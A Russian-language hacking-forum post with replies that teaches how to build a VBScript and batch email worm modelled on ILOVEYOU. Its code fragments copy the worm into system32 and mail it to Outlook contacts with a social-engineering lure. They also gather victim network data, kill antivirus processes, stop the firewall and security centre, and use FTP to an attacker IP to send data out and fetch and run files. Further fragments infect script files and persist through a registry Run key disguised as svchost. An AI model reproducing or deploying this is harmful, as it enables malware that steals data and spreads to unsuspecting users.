Многие забывают о всех плюсах такого скриптового языка как vbscript, хотя их больше чем минусов! Сегодня для общей оценки, я написал маленькую статью о том, как написать простейший вирус, используя всего два языка, которые по любому должны входить в базис любого пользователя. это: vbscript + batch Начнем с того, что многие нашумевшие черви, как мыльные, так и шаравые, были написаны, используя именно эти два языка. Я не хочу сказать, что нужно все кинуть и начать творить на них, нет!, ни в коем случае!, но и знать, и помнить о них надо! В пример возьмем так сильно нашумевший мыльный червь I love you(назовем его Ilu), написал он был полностью на VBS хотя не трудно переписать его и под JS но разговор не об этом! 1)Действия червя . Начнем с того, что Ilu был запущен на компьютере клиента, используя функцию “File.Copy” червь сам себя копировал в папку system32, изменив свое имя, откуда и начинал свою работу, После копирования, Ilu пытался разослать себя используя Dim OutMail, Index, OutlookObject Set OutlookObject = CreateObject("Outlook.Application") поставив заведомо цикл на допустим 50 отправлений со сменой адресов, которые тянуться из базы клиента Outlook, то есть по тем кто в “адресной книге” у клиента, при этом прикрепив себя с уже измененным именем!, так не хитро, НО очень быстро червь расползся по всему миру! 2) написание своего ….. Я же используя туже схему напишу downloader и при этом припишем bat вирус. Начнем…. Совмести эти два я зыка! VBS используем как скелет, а Batch будет у нас - кишками Используя все ту же функцию – «File.Copy ("")» Мы скопируем его нашего зверька в системную директорию system32 После чего заставим его создать bath (что и не обязательно, все что пишется в batch можно проделать используя только один vbs!) const root = "c:\windows\system32\" const scriptnam = "c:\windows\system32\run.bat" set fs = CreateObject("Scripting.FileSystemObject") _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ f_out.writeline("echo off") в самом bath : опишу функцию нашего bath он, можно сказать, будет ответственным за все!, в него мы и вложим весь замысел downloader! первые строки мы отдадим сборке инфы о жертве, простейшего ipconfig /all хватит но можно, все что угодно! ipconfig /all >>%COMPUTERNAME%_d.html далее мы перейдем к борьбе с avp (например некоторые из них можно убить простым taskkill) используем taskkill /f /im, после можно заняться и Брандмауэром, просто выключить его можно, но тогда зажжется окошечко в тре с предупреждением и этим нам всем ненавистным щитом, но это можно избежать: 1) Выключить Брандмауэр можно командой net stop которая выполниться в нашем батнике! 2) выключим сообщение в тре, их вызывает wscsvc (Центр обеспечения безопасности) так же через net stop. 3) либо просто добавить в стандарт командой netsh firewall После того как все это было проделано, создадим соединение (тут уже как вашей душе угодно) можно прямо на ваш комп используя telnet который также можно запустить как у вас так и у жертвы все тем же банальным net start на прослушиваемый вами порт. я же использовал ftp легко и дешево =) (кстати посредством этого можно сделать его полностью управляемы но это я опишу в конце) Создать такое соединение всем известно со времен ещё kaht`а Так что не всем будет загадкой что его нужно проделать через «echo open ххх.ххх.ххх.ххх >seksi» Перелив инфу о компе, можно закачать произвольные файлы и так же их запустить. Кстати не забывайте убрать следы, ту «seksi» а то пропалитесь сразу-же! ) На этом не остановимся, так как в задаче стояло создать вирус – червь, продолжим его создание! Что мы уже имеем: 1) скелет – носитель vbs. 2) пока не все но кишки в которые на данный момент входит. а) сбор инфы о жертве. в) выключение Брандмауэра и так же некоторых avp. с) отправка отчёта, и закачка нужного софта на компьютер жертвы. Ну что пойдем дальше и снова обратимся к vbs, переписав немного сорцы Ilu, можно получить готовый распространитель и при этом, который не будет палиться! On Error Resume Next Dim WshShell_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ Set OutMail = OutlookObject.CreateItem(0) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ OutMail.Subject = "привет" OutMail.Body = "Привет! я давно не писала, да и ты тоже, тут недавно зашла на один сайт и сразу вспомнила тебя! Не знаю почему может ты поймешь? http://olyaseksi.hut2.ru там девушка красивая, и что то в ней до боли знакомое! Тебе так не кажется? никого не узнаешь?" OutMail.Attachments.Add("c:\windows\system32\systemdow.vbs") OutMail.Send Next Дописать это к нашему жучку и вуаля! все работает и не жужжит! Но на этом мы не остановимся! а добавим сначала сам весь черв в такие файлы как pagefileconfig.vbs и prnport.vbs – очень советую изучить, т.к. можно использовать для бинд шелла! Ну и так далее все с расширением vbs. Исполним это командой дописывания, опять же через бат средства! Хочу заметить, что придется проверять файлы на наличие уже заражения, все это можно легко провернуть! и так: 1) Проверка (выберите сигнатурку – то чем будет отличаться ваш код «например слово «медвед»») find " медвед " < *.bat > nul if errorlevel 1 goto тут должна стоять переменная функции заражения goto next 2) само заражение (произойдет простым добавлением своего кода!) используем для этого команду «type» После заражения vbs скриптов системной директории , можно таким же способом заразить и batch файлы . теперь мы получили хорошего зверька! И та, что мы имеем: подведем итоги: 1) скелет – носитель vbs. 2) кишки в которые входит, а) сбор инфы о жертве. в) выключение Брандмауэром и так же некоторых avp. с) отправка отчёта, и закачка нужного софта, на компьютер жертвы. d) распространение себя по мылу. i) заражение файлов с расширением vbs и bat. Ну и на последок, как и обещал немного разных вещей, например, удаленное управление. Помимо того что вы можете закачать и запустить бэкдор, вы можете управлять компом по средством batch файлов, закачав его через ftp уже готовый скрипт с готовой в нем задач. То есть, заставить вашего жучка при попадании на комп скачивать нужный файл и ещё и сам bat файл с командой для компа, который будет запускаться в скрытом режиме что позволит нам vbs скрипт WshShell.Run "c:\windows\system32\run.bat", 0, False Так же чтобы это происходило систематично можно добавить самого червя в автозагрузку, добавив запись в реестр: WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost", "c:\windows\system32\systemdow.vbs" Но это даст нам всего лишь запуск при загрузки компа, а для повременного используем ДОС команду SCHTASKS разобраться в ней не сложно, можно поставить как время так и имя процесса под которым будет запускаться файл на исполнение. Далее для того чтобы не утяжелять процессы, можно воспользоваться переменными ДОС && которые позволят нам определить наличие подключения к Интернету! Например: Ping ya.ru && start jopa.vbs Кстати не забывайте что все содержимое как vbs так и bat можно не только зашифровать но и компилировать в приложение. (exe – файл) Также напомню, что все использованное в batch можно, сделать и в vbscript не прибегая, к помощи самого батника. © Forint 13.06.06 Privat.inattack.ru from antichat.ru antichat.ru forever
спасибо . но надеюсь это не все слова которые были казанны в мой адрес! критикуйте хоть , вопросы там если кому что не понятно ! просто я писал на уровне того кто уже с талкнулся с этим, и знает более менее синтоксиз таких скриптов!
2 lexa Думаю, стоит привести полные коды скелета и наполнителя (понятно, что вариантов много, но их можно добавить комментированными).
=) все просто, маны по языкам написания, которые были тут описаны. если все разжованно давать , то что тут будет, пусть сами находят , темболее я главное написал , а найти под них продолжение ен составит особого труда! могу привести пример, нахождения! =) наверно многим не понравиться такой ответ но это мое мнение!
Помню читал что-то про Ilu давно, помню что было похоже. http://mwakeks3.narod.ru/love.htm - вот что выдал яндекс, это не то? lexa, в последнее время много людей просто переделывают статьи чужие и все, поэтому извини, если ошибаюсь. P.S. Хз че за сайт - Нод32 выдал, что возможно неизвестный скрипт-вирус и предложил заблокировать угрозу, поэтому аккуратнее. P.P.S. оказалось, что он реагирует на текст вируса на странице.
нет ! я конечно же не обижусь! просто как видишь там идет описание самой функции , алгоритма скрипта ilu , а в частности отсылки самого себя. Я же написал, как, изменив его структуру можно опять же рассылаться, и при этом добавил иной язык добавив больше функций! так что моя и та статья совсем разные вещи, короче это разные вещи , все что было написанно в этой статье все было из моей головы, и мне !
да ! а что там делать просто запустить его и все ! или ты имел в виду скрытом, то этот вариант я описал !
